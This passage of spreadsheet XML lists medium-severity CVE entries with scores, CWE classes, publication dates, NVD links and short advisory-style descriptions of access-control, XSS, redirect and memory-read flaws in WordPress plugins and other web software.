      <c r="F5195" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5195" s="5" t="inlineStr"/>
      <c r="H5195" s="5" t="inlineStr"/>
      <c r="I5195" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J5195" s="5" t="inlineStr"/>
      <c r="K5195" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L5195" s="5" t="inlineStr">
        <is>
          <t>The Accept Stripe Payments WordPress plugin before 2.1.4 does not verify that the product fulfilled when a checkout is completed matches the product the authoritative payment was actually made for, checking only that the amount paid is at least the referenced product's price, allowing unauthenticated attackers who complete a genuine payment to obtain fulfilment for a different, equal- or lower-priced product than the one they paid for.</t>
        </is>
      </c>
      <c r="M5195" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81424</t>
        </is>
      </c>
    </row>
    <row r="5196">
      <c r="A5196" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5196" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81647</t>
        </is>
      </c>
      <c r="C5196" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5196" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5196" s="5" t="inlineStr"/>
      <c r="F5196" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5196" s="5" t="inlineStr"/>
      <c r="H5196" s="5" t="inlineStr"/>
      <c r="I5196" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5196" s="5" t="inlineStr"/>
      <c r="K5196" s="5" t="inlineStr">
        <is>
          <t>CWE-680</t>
        </is>
      </c>
      <c r="L5196" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read vulnerability in the graphics module.
Impact: Successful exploitation of this vulnerability may affect availability.</t>
        </is>
      </c>
      <c r="M5196" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81647</t>
        </is>
      </c>
    </row>
    <row r="5197">
      <c r="A5197" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5197" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82023</t>
        </is>
      </c>
      <c r="C5197" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5197" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5197" s="5" t="inlineStr"/>
      <c r="F5197" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5197" s="5" t="inlineStr"/>
      <c r="H5197" s="5" t="inlineStr"/>
      <c r="I5197" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J5197" s="5" t="inlineStr"/>
      <c r="K5197" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L5197" s="5" t="inlineStr">
        <is>
          <t>LearnPress WordPress Plugin before 4.4.6 contains a broken object-level authorization vulnerability that allows authenticated attackers with the Instructor role to add answers to quiz questions owned by other instructors by exploiting a missing ownership check on the question answer insert path. Attackers can supply arbitrary question identifiers during answer insertion, bypassing instructor-boundary restrictions to persistently modify quiz content across courses they do not own.</t>
        </is>
      </c>
      <c r="M5197" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82023</t>
        </is>
      </c>
    </row>
    <row r="5198">
      <c r="A5198" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5198" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82066</t>
        </is>
      </c>
      <c r="C5198" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5198" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5198" s="5" t="inlineStr"/>
      <c r="F5198" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5198" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H5198" s="5" t="inlineStr"/>
      <c r="I5198" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5198" s="5" t="inlineStr"/>
      <c r="K5198" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L5198" s="5" t="inlineStr">
        <is>
          <t>A heap out-of-bounds read security issue exists in the query planning component of MongoDB Server. An authenticated user with database read and write privileges can trigger the security issue through crafted query operations, causing the server to read memory beyond allocated buffer boundaries. The revealed memory contents may be partially observable through diagnostic query statistics output.</t>
        </is>
      </c>
      <c r="M5198" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82066</t>
        </is>
      </c>
    </row>
    <row r="5199">
      <c r="A5199" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5199" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82184</t>
        </is>
      </c>
      <c r="C5199" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5199" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5199" s="5" t="inlineStr"/>
      <c r="F5199" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5199" s="5" t="inlineStr"/>
      <c r="H5199" s="5" t="inlineStr"/>
      <c r="I5199" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5199" s="5" t="inlineStr"/>
      <c r="K5199" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5199" s="5" t="inlineStr">
        <is>
          <t>The WPLP Cookie Consent  WordPress plugin before 4.4.2 does not have any authorisation or CSRF checks when storing visitor consent state, and the code that does so runs on every front-end page load, allowing unauthenticated attackers to overwrite a site-wide option with arbitrary data.</t>
        </is>
      </c>
      <c r="M5199" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82184</t>
        </is>
      </c>
    </row>
    <row r="5200">
      <c r="A5200" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5200" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82213</t>
        </is>
      </c>
      <c r="C5200" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5200" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5200" s="5" t="inlineStr"/>
      <c r="F5200" s="5" t="inlineStr"/>
      <c r="G5200" s="5" t="inlineStr"/>
      <c r="H5200" s="5" t="inlineStr"/>
      <c r="I5200" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J5200" s="5" t="inlineStr"/>
      <c r="K5200" s="5" t="inlineStr"/>
      <c r="L5200" s="5" t="inlineStr">
        <is>
          <t>The Nexi XPay Build WordPress plugin from 7.6.1 to 7.6.2 does not verify that the saved payment token being requested belongs to the current user, allowing unauthenticated attackers to retrieve other customers' stored card token references together with a valid authorisation signature.</t>
        </is>
      </c>
      <c r="M5200" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82213</t>
        </is>
      </c>
    </row>
    <row r="5201">
      <c r="A5201" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5201" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82305</t>
        </is>
      </c>
      <c r="C5201" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5201" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5201" s="5" t="inlineStr"/>
      <c r="F5201" s="5" t="inlineStr"/>
      <c r="G5201" s="5" t="inlineStr"/>
      <c r="H5201" s="5" t="inlineStr"/>
      <c r="I5201" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J5201" s="5" t="inlineStr"/>
      <c r="K5201" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L5201" s="5" t="inlineStr">
        <is>
          <t>The YITH WooCommerce Wishlist WordPress plugin before 4.18.1 does not verify that a user is authorised to rename a given wishlist, allowing unauthenticated users to rename any wishlist on the site.</t>
        </is>
      </c>
      <c r="M5201" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82305</t>
        </is>
      </c>
    </row>
    <row r="5202">
      <c r="A5202" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5202" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82394</t>
        </is>
      </c>
      <c r="C5202" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5202" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5202" s="5" t="inlineStr"/>
      <c r="F5202" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5202" s="5" t="inlineStr"/>
      <c r="H5202" s="5" t="inlineStr"/>
      <c r="I5202" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J5202" s="5" t="inlineStr"/>
      <c r="K5202" s="5" t="inlineStr">
        <is>
          <t>CWE-862, CWE-863</t>
        </is>
      </c>
      <c r="L5202" s="5" t="inlineStr">
        <is>
          <t>Sulu is an open-source PHP content management system based on the Symfony framework. Prior to versions 2.6.25 and 3.0.8, the preview-link endpoint and src/Sulu/Bundle/PreviewBundle/Application/Manager/PreviewLinkManager.php do not enforce VIEW permission for the target resource in PreviewLinkManager::generate() or PreviewLinkManager::revoke(). An authenticated administration user who knows a target resource identifier can create or revoke a preview link for any page, article, or snippet, including content in a webspace or area the user cannot view. A generated preview URL is public and resolves content by an opaque token, allowing the user or anyone receiving the link to read restricted content without authentication. This issue is fixed in versions 2.6.25 and 3.0.8.</t>
        </is>
      </c>
      <c r="M5202" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82394</t>
        </is>
      </c>
    </row>
    <row r="5203">
      <c r="A5203" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5203" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82395</t>
        </is>
      </c>
      <c r="C5203" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5203" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5203" s="5" t="inlineStr"/>
      <c r="F5203" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5203" s="5" t="inlineStr"/>
      <c r="H5203" s="5" t="inlineStr"/>
      <c r="I5203" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J5203" s="5" t="inlineStr"/>
      <c r="K5203" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-863</t>
        </is>
      </c>
      <c r="L5203" s="5" t="inlineStr">
        <is>
          <t>Sulu is an open-source PHP content management system based on the Symfony framework. Prior to versions 2.6.25 and 3.0.8, the media move endpoint derives its permission check from the client-supplied collection value instead of the media item's actual source collection, and src/Sulu/Bundle/MediaBundle/Media/Manager/MediaManager.php allows MediaManager::move() to reassign the item without checking that source. An authenticated backend user with edit permission on one collection and knowledge of a target media identifier can name the allowed collection in the request, move an item out of a restricted collection, and then view or download content the user was not permitted to access. This issue is fixed in versions 2.6.25 and 3.0.8.</t>
        </is>
      </c>
      <c r="M5203" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82395</t>
        </is>
      </c>
    </row>
    <row r="5204">
      <c r="A5204" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5204" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82464</t>
        </is>
      </c>
      <c r="C5204" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5204" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5204" s="5" t="inlineStr"/>
      <c r="F5204" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5204" s="5" t="inlineStr"/>
      <c r="H5204" s="5" t="inlineStr"/>
      <c r="I5204" s="5" t="inlineStr">
        <is>
          <t>2026-08-29</t>
        </is>
      </c>
      <c r="J5204" s="5" t="inlineStr"/>
      <c r="K5204" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="L5204" s="5" t="inlineStr">
        <is>
          <t>pac4j-core before 6.5.6 contains an open redirect vulnerability in DefaultLogoutLogic.perform() that accepts backslash-prefixed logout redirect targets matching logoutUrlPattern. Attackers can craft logout links with backslash-prefixed external hosts that browsers normalize into network-path references, redirecting victims to attacker-controlled sites after logout.</t>
        </is>
      </c>
      <c r="M5204" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82464</t>
        </is>
      </c>
    </row>
    <row r="5205">
      <c r="A5205" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5205" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82582</t>
        </is>
      </c>
      <c r="C5205" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5205" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5205" s="5" t="inlineStr"/>
      <c r="F5205" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5205" s="5" t="inlineStr"/>
      <c r="H5205" s="5" t="inlineStr"/>
      <c r="I5205" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J5205" s="5" t="inlineStr"/>
      <c r="K5205" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L5205" s="5" t="inlineStr">
        <is>
          <t>An authorization bypass vulnerability exists in SHIRASAGI through a user-controlled key, which may allow an unauthorized attacker to retrieve files from the groupware's shared file feature.</t>
        </is>
      </c>
      <c r="M5205" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82582</t>
        </is>
      </c>
    </row>
    <row r="5206">
      <c r="A5206" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5206" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82633</t>
        </is>
      </c>
      <c r="C5206" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5206" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5206" s="5" t="inlineStr"/>
      <c r="F5206" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5206" s="5" t="inlineStr"/>
      <c r="H5206" s="5" t="inlineStr"/>
      <c r="I5206" s="5" t="inlineStr">
        <is>
          <t>2026-08-30</t>
        </is>
      </c>
      <c r="J5206" s="5" t="inlineStr"/>
      <c r="K5206" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5206" s="5" t="inlineStr">
        <is>
          <t>Dolibarr versions 10.0.0 before 24.0.0 fail to perform per-object authorization checks in the Users::getGroups REST API endpoint, allowing authenticated users to retrieve group memberships of other users. Attackers can call GET /users/{id}/groups with arbitrary user identifiers to access group names, entity associations, and private notes across tenant boundaries.</t>
        </is>
      </c>
      <c r="M5206" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82633</t>
        </is>
      </c>
    </row>
    <row r="5207">
      <c r="A5207" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5207" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82660</t>
        </is>
      </c>
      <c r="C5207" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5207" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5207" s="5" t="inlineStr"/>
      <c r="F5207" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5207" s="5" t="inlineStr"/>
      <c r="H5207" s="5" t="inlineStr"/>
      <c r="I5207" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J5207" s="5" t="inlineStr"/>
      <c r="K5207" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5207" s="5" t="inlineStr">
        <is>
          <t>Nodemailer before 8.0.9 fails to enforce disableFileAccess and disableUrlAccess options during message normalization in jsonTransport. Attackers can read local files or fetch URLs by supplying path or href values in message content fields, bypassing intended access controls.</t>
        </is>
      </c>
      <c r="M5207" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82660</t>
        </is>
      </c>
    </row>
    <row r="5208">
      <c r="A5208" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5208" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82661</t>
        </is>
      </c>
      <c r="C5208" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5208" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5208" s="5" t="inlineStr"/>
      <c r="F5208" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5208" s="5" t="inlineStr"/>
      <c r="H5208" s="5" t="inlineStr"/>
      <c r="I5208" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J5208" s="5" t="inlineStr"/>
      <c r="K5208" s="5" t="inlineStr">
        <is>
          <t>CWE-93</t>
        </is>
      </c>
      <c r="L5208" s="5" t="inlineStr">
        <is>
          <t>Nodemailer before 8.0.9 fails to sanitize carriage return and line feed characters in list comment fields, allowing attackers to inject arbitrary message headers. An attacker with control over list.*.comment parameters can inject CRLF sequences to create additional headers in generated RFC822 messages, altering mail client behavior and message semantics.</t>
        </is>
      </c>
      <c r="M5208" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82661</t>
        </is>
      </c>
    </row>
    <row r="5209">
      <c r="A5209" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5209" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-8279</t>
        </is>
      </c>
      <c r="C5209" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5209" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5209" s="5" t="inlineStr"/>
      <c r="F5209" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5209" s="5" t="inlineStr"/>
      <c r="H5209" s="5" t="inlineStr"/>
      <c r="I5209" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J5209" s="5" t="inlineStr"/>
      <c r="K5209" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5209" s="5" t="inlineStr">
        <is>
          <t>The Masteriyo LMS plugin for WordPress is vulnerable to unauthorized data deletion due to a missing capability check on the 'delete_item_permissions_check' function in the CourseProgressItemsController in all versions up to, and including, 2.2.0. This makes it possible for unauthenticated attackers to delete arbitrary course progress records belonging to any student.</t>
        </is>
      </c>
      <c r="M5209" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-8279</t>
        </is>
      </c>
    </row>
    <row r="5210">
      <c r="A5210" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5210" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82848</t>
        </is>
      </c>
      <c r="C5210" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5210" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5210" s="5" t="inlineStr"/>
      <c r="F5210" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5210" s="5" t="inlineStr"/>
      <c r="H5210" s="5" t="inlineStr"/>
      <c r="I5210" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5210" s="5" t="inlineStr"/>
      <c r="K5210" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5210" s="5" t="inlineStr">
        <is>
          <t>The Masteriyo LMS  WordPress plugin before 3.4.0 does not perform any authorization check before returning a course enrolment record over its REST API, allowing unauthenticated users to read any learner's enrolment status, timestamps and course-progress data by walking sequential record identifiers. A related gap lets any enrolled user retrieve other learners' enrolment records as well.</t>
        </is>
      </c>
      <c r="M5210" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82848</t>
        </is>
      </c>
    </row>
    <row r="5211">
      <c r="A5211" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5211" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82867</t>
        </is>
      </c>
      <c r="C5211" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5211" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5211" s="5" t="inlineStr"/>
      <c r="F5211" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5211" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5211" s="5" t="inlineStr"/>
      <c r="I5211" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J5211" s="5" t="inlineStr"/>
      <c r="K5211" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5211" s="5" t="inlineStr">
        <is>
          <t>@pdfme/schemas before 5.5.9 contains a cross-site scripting vulnerability in the Select schema plugin that fails to sanitize option values before interpolating them into HTML via innerHTML. Attackers can supply malicious templates with crafted option values containing HTML and JavaScript to execute arbitrary code in users' browsers.</t>
        </is>
      </c>
      <c r="M5211" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82867</t>
        </is>
      </c>
    </row>
    <row r="5212">
      <c r="A5212" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5212" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82868</t>
        </is>
      </c>
      <c r="C5212" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5212" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5212" s="5" t="inlineStr"/>
      <c r="F5212" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5212" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5212" s="5" t="inlineStr"/>
      <c r="I5212" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J5212" s="5" t="inlineStr"/>
      <c r="K5212" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5212" s="5" t="inlineStr">
        <is>
          <t>@pdfme/schemas before 5.5.9 contains a cross-site scripting vulnerability in the SVG schema plugin that renders user-supplied SVG content directly to innerHTML without sanitization. Attackers can inject malicious SVG with embedded scripts, event handlers, or foreignObject elements to execute arbitrary JavaScript in users' browsers when viewing or filling templates.</t>
        </is>
      </c>
      <c r="M5212" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82868</t>
        </is>
      </c>
    </row>
    <row r="5213">
      <c r="A5213" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5213" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82873</t>
        </is>
      </c>
      <c r="C5213" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5213" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5213" s="5" t="inlineStr"/>
      <c r="F5213" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5213" s="5" t="inlineStr"/>
      <c r="H5213" s="5" t="inlineStr"/>
      <c r="I5213" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J5213" s="5" t="inlineStr"/>
      <c r="K5213" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L5213" s="5" t="inlineStr">
        <is>
          <t>ToolJet through 3.0.0-ee-beta.2 contains authorization bypass vulnerabilities in the POST /api/v2/resources/export endpoint that allow authenticated users to disclose TooljetDB table schemas across workspace boundaries and export app definitions across granular permission boundaries. Attackers can supply a body-provided organization_id parameter to access schemas from other workspaces, or bypass per-app authorization gates to export restricted app definitions within their workspace.</t>
        </is>
      </c>
      <c r="M5213" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82873</t>
        </is>
      </c>
    </row>
    <row r="5214">
      <c r="A5214" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5214" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82878</t>
        </is>
      </c>
      <c r="C5214" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5214" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5214" s="5" t="inlineStr"/>
      <c r="F5214" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5214" s="5" t="inlineStr"/>
      <c r="H5214" s="5" t="inlineStr"/>
      <c r="I5214" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J5214" s="5" t="inlineStr"/>
      <c r="K5214" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5214" s="5" t="inlineStr">
        <is>
          <t>DataEase versions before 2.10.26 omit object-level authorization checks on geographic information, dashboard linkage, and chart detail REST endpoints, allowing authenticated users to access resources belonging to other users. Attackers can overwrite or delete map geometry, modify dashboard linkages, and retrieve chart metadata and configuration for resources they do not own by supplying arbitrary identifiers in requests.</t>
        </is>
      </c>
      <c r="M5214" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82878</t>
        </is>
      </c>
    </row>
    <row r="5215">
      <c r="A5215" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5215" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82879</t>
        </is>
      </c>
      <c r="C5215" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5215" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5215" s="5" t="inlineStr"/>
      <c r="F5215" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5215" s="5" t="inlineStr"/>
      <c r="H5215" s="5" t="inlineStr"/>
      <c r="I5215" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J5215" s="5" t="inlineStr"/>
      <c r="K5215" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L5215" s="5" t="inlineStr">
        <is>
          <t>DataEase before 2.10.26 contains multiple access control defects in the sharing link module. Tickets are not bound to the target share UUID, so a valid ticket issued for one share can be reused against another (ShareTicketManage.validateTicket / POST /de2api/share/proxyInfo). The POST /de2api/share/validate endpoint issues a LinkToken after password verification without requiring a ticket, bypassing the 'ticket mandatory' policy. Additionally, the ticket create and delete endpoints (POST /de2api/ticket/saveTicket, POST /de2api/ticket/delTicket) lack share-ownership checks, allowing an authenticated user who knows another user's ticket to modify, rebind, or delete it (denial of service), and GET /de2api/share/queryRelationByUserId/{uid} allows authenticated users to enumerate other users' share mappings.</t>
        </is>
      </c>
      <c r="M5215" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82879</t>
        </is>
      </c>
    </row>
    <row r="5216">
      <c r="A5216" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5216" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83537</t>
        </is>
      </c>
      <c r="C5216" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5216" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5216" s="5" t="inlineStr"/>
      <c r="F5216" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5216" s="5" t="inlineStr"/>
      <c r="H5216" s="5" t="inlineStr"/>
      <c r="I5216" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5216" s="5" t="inlineStr"/>
      <c r="K5216" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="L5216" s="5" t="inlineStr">
        <is>
          <t>The WP Express Checkout WordPress plugin before 2.5.0 does not verify server-side that a payment was actually completed before marking an order as paid, allowing unauthenticated users to forge a completed order without paying.</t>
        </is>
      </c>
      <c r="M5216" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83537</t>
        </is>
      </c>
    </row>
    <row r="5217">
      <c r="A5217" s="5" t="inlineStr">
        <is>
